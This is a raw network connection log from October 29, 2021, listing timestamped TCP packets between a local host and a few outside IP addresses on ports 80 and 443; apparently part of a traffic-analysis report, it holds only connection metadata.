                                                                                                                          Oct 29, 2021 17:06:45.914352894 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914366007 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914381027 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.914407969 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914427042 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.914447069 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914468050 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.914472103 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914508104 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.914520025 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914537907 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.914541960 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914592028 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914593935 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.914603949 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914642096 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914659977 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.914684057 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914706945 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.914719105 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.914752007 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.930068970 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.930126905 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.930180073 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.930228949 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.930381060 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.930433035 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:45.930455923 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:45.930541039 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.015070915 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.015115976 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.015202999 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.077811956 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.077841043 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.077861071 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.077914000 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.077960014 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.077972889 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.077987909 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.078001976 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.078021049 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.078027964 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.078087091 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.078097105 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.078131914 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.078167915 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.086899996 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.086914062 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.086997986 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.087321997 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.087326050 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.087338924 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.087346077 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.087435007 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.087440968 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.087451935 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.087572098 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.087578058 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.087652922 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.127362967 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.127386093 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.127454996 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.127650023 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.127654076 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.127665043 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.127671003 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.127748966 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.127757072 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.127768040 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.127803087 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.127849102 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.130208969 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.130219936 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.130306005 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.130630970 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.130635977 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.130649090 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.130654097 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.130724907 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.130733013 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.130745888 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.130775928 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.130826950 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.133183002 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.133193016 CEST44349813162.159.134.233192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.133315086 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.133513927 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.135260105 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.222524881 CEST49813443192.168.2.7162.159.134.233
                                                                                                                          Oct 29, 2021 17:06:46.627515078 CEST4981480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.681108952 CEST8049814185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.681278944 CEST4981480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.681514025 CEST4981480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.681529999 CEST4981480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.734791040 CEST8049814185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.734808922 CEST8049814185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.763101101 CEST8049814185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.763169050 CEST4981480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.763415098 CEST4981480192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.806883097 CEST4981580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.816636086 CEST8049814185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.860519886 CEST8049815185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.862664938 CEST4981580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.862818956 CEST4981580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.862843037 CEST4981580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.940515995 CEST8049815185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:46.940915108 CEST4981580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.940944910 CEST4981580192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.979337931 CEST4981680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:46.995351076 CEST8049815185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.032982111 CEST8049816185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.033086061 CEST4981680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.033178091 CEST4981680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.033190966 CEST4981680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.114922047 CEST8049816185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.114983082 CEST4981680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.140188932 CEST4981680192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.193639994 CEST8049816185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.246612072 CEST49817443192.168.2.781.177.141.36
                                                                                                                          Oct 29, 2021 17:06:47.246650934 CEST4434981781.177.141.36192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.246814013 CEST49817443192.168.2.781.177.141.36
                                                                                                                          Oct 29, 2021 17:06:47.247811079 CEST49817443192.168.2.781.177.141.36
                                                                                                                          Oct 29, 2021 17:06:47.247824907 CEST4434981781.177.141.36192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.381829023 CEST4434981781.177.141.36192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.381954908 CEST49817443192.168.2.781.177.141.36
                                                                                                                          Oct 29, 2021 17:06:47.383898973 CEST49817443192.168.2.781.177.141.36
                                                                                                                          Oct 29, 2021 17:06:47.383914948 CEST4434981781.177.141.36192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.384150028 CEST4434981781.177.141.36192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.399200916 CEST49817443192.168.2.781.177.141.36
                                                                                                                          Oct 29, 2021 17:06:47.440876007 CEST4434981781.177.141.36192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.483511925 CEST4434981781.177.141.36192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.483594894 CEST4434981781.177.141.36192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.483742952 CEST49817443192.168.2.781.177.141.36
                                                                                                                          Oct 29, 2021 17:06:47.483966112 CEST49817443192.168.2.781.177.141.36
                                                                                                                          Oct 29, 2021 17:06:47.484003067 CEST4434981781.177.141.36192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.484025002 CEST49817443192.168.2.781.177.141.36
                                                                                                                          Oct 29, 2021 17:06:47.484041929 CEST4434981781.177.141.36192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.514590979 CEST4981880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.566802025 CEST8049818185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.566920042 CEST4981880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.567079067 CEST4981880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.567100048 CEST4981880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.644691944 CEST8049818185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.644887924 CEST4981880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.645203114 CEST4981880192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.676032066 CEST4981980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.697288990 CEST8049818185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.728138924 CEST8049819185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.729235888 CEST4981980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.729374886 CEST4981980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.729398966 CEST4981980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.810146093 CEST8049819185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.810425043 CEST4981980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.810806036 CEST4981980192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.848563910 CEST4982080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.862983942 CEST8049819185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.899960041 CEST8049820185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.900048971 CEST4982080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.900202036 CEST4982080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.900214911 CEST4982080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.977674961 CEST8049820185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:47.977776051 CEST4982080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:47.977973938 CEST4982080192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.008474112 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.029257059 CEST8049820185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.061372042 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.061726093 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.061839104 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.061855078 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.114629984 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140559912 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140593052 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140620947 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140642881 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140667915 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140691042 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140706062 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.140712023 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140733957 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.140734911 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140757084 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140778065 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.140788078 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.140816927 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.193557024 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193589926 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193610907 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193634033 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193655014 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193669081 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.193675995 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193697929 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193718910 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.193718910 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193744898 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193766117 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193772078 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.193790913 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193810940 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.193811893 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193835020 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193856001 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193875074 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.193876028 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193900108 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193917036 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.193922997 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193941116 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.193945885 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193967104 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.193989992 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.246628046 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.246659040 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.246680975 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.246701956 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.246702909 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.246731997 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.246747017 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.246769905 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.246798038 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.247000933 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247026920 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247045040 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.247050047 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247075081 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247097969 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247100115 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.247122049 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247140884 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.247145891 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247168064 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247175932 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.247191906 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247214079 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247236013 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.247242928 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.247279882 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.299525023 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299556017 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299580097 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299602032 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299618006 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299618006 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.299633026 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299650908 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299662113 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.299669027 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299688101 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.299710989 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.299798012 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299815893 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299830914 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299846888 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299854994 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.299865961 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299881935 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299890041 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.299912930 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.299947977 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299966097 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299981117 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.299998045 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.300009012 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.300034046 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.300097942 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.300115108 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.300152063 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.352843046 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.352937937 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.352963924 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.352988958 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353014946 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353029013 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.353039980 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353066921 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353097916 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.353107929 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.353265047 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353291035 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353312016 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.353315115 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353342056 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353353977 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.353367090 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353416920 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.353550911 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353575945 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353638887 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.353717089 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353743076 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353765965 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353790998 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353794098 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.353816032 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353840113 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353847980 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.353867054 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.353888035 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.405330896 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.405879021 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.405910015 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.405942917 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.405966043 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.405989885 CEST8049821185.98.87.159192.168.2.7
                                                                                                                          Oct 29, 2021 17:06:48.406002045 CEST4982180192.168.2.7185.98.87.159
                                                                                                                          Oct 29, 2021 17:06:48.406014919 CEST8049821185.98.87.159192.168.2.7
